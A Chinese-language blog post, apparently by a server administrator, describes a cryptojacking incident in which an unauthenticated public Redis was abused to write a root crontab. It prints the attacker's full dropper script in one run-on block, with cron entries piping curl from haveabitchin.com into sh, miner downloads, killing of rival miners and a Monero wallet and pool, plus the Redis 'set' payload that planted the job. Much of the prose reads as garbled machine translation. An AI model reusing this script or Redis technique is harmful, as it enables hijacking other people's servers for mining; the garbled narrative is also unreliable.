利用redis漏洞远程添加计划任务挖取比特币

利用redis漏洞远程添加计划任务挖取比特币

周日看到工作人员发来了群内几台网络服务器CPU负载高的警报。不在乎。周一中午查了一下nagios，发现网络服务器的负载还是很高。快检查进度。

见第二张图。每个人都想得到它。也是挖矿软件。还记得之前透露过是一个叫minerd的挖币节目。这东西。完成这个过程肯定是不够的。必须有一个相对的守护进程或任务计划。crontab问道。果然，

可恶的域名竟然是Havehaveabitchin(谷歌)。这个域名可以说是充满了邪恶的东西。网上的挖矿软件大部分都是用这个域名分发的)。装上他的脚本后，你就可以知己知彼，百战不殆了。

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0218 | sh" > /var/spool/cron/root mkdir -p /var/spool/cron/crontabs echo "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0218 | sh" > /var/spool/cron/crontabs/root if [ ! -f "/tmp/ddg.222" ]; then curl -fsSL http://www.haveabitchin.com/ddg.$(uname -m) -o /tmp/ddg.222 fi chmod x /tmp/ddg.222 && /tmp/ddg.222 CleanTail() { ps auxf|grep -v grep|grep /tmp/duckduckgo|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "/usr/sbin/ntp"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "/opt/minerd"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9 } DoYam() { if [ ! -f "/tmp/AnXqV.yam" ]; then curl -fsSL http://www.haveabitchin.com/yam -o /tmp/AnXqV.yam fi chmod x /tmp/AnXqV.yam /tmp/AnXqV.yam -c x -M stratumtcp://44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu2GB7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM:x@xmr.crypto-pool.fr:443/xmr } DoMiner() { if [ ! -f "/tmp/AnXqV" ]; then curl -fsSL http://www.haveabitchin.com/minerd -o /tmp/AnXqV fi chmod x /tmp/AnXqV /tmp/AnXqV -B -a cryptonight -o stratumtcp://xmr.crypto-pool.fr:443 -u 44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu2GB7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM -p x } DoMinerNoAes() { if [ ! -f "/tmp/AnXqV.noaes" ]; then curl -fsSL http://www.haveabitchin.com/minerd.noaes -o /tmp/AnXqV.noaes fi chmod x /tmp/AnXqV.noaes /tmp/AnXqV.noaes -B -a cryptonight -o stratumtcp://xmr.crypto-pool.fr:443 -u 44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu2GB7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM -p x } ps auxf|grep -v grep|grep "4ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "AnXqV" || DoMiner ps auxf|grep -v grep|grep "AnXqV" || DoYam ps auxf|grep -v grep|grep "AnXqV" || DoMinerNoAes

在此过程中仔细询问了该问题。又抓到他的恶魔了。

还原犯罪现场

因为这些设备都是接口测试。还没公布。看流程，发现redis其实是在监控公网地址。并且没有登录密码。以前，我可以根据redis更改数据存储文件的目录和文件夹名称，并将公钥提交给网络服务器。但是绝对禁止非企业IP在无线路由器上浏览SSH。那么程序流程是如何嵌入网络服务器的呢？查询redis的AOF文档。终于找到漏洞了。

看到了这个实际 *** 作。

set 1 “\n\n*/1 * * * * curl -L http://www.haveabitchin.com/pm.sh?v21.redis.lan?6389 | sh\n\n” del 1

图中网址的脚本内容我就不贴了，和上一个差不多。

以前的系统漏洞是将公钥加载到。网络服务器的ssh文件目录。既然***懒了，我就不用登录web服务器了。使用任务计划，网络服务器可以自动挖掘硬币。

实际完成情况是:

***将redis的数据存储文件目录放入/var/spool/cron。文件夹名称是root。当crontab运行时。将新任务计划添加到网络服务器。然后钥匙就被删了。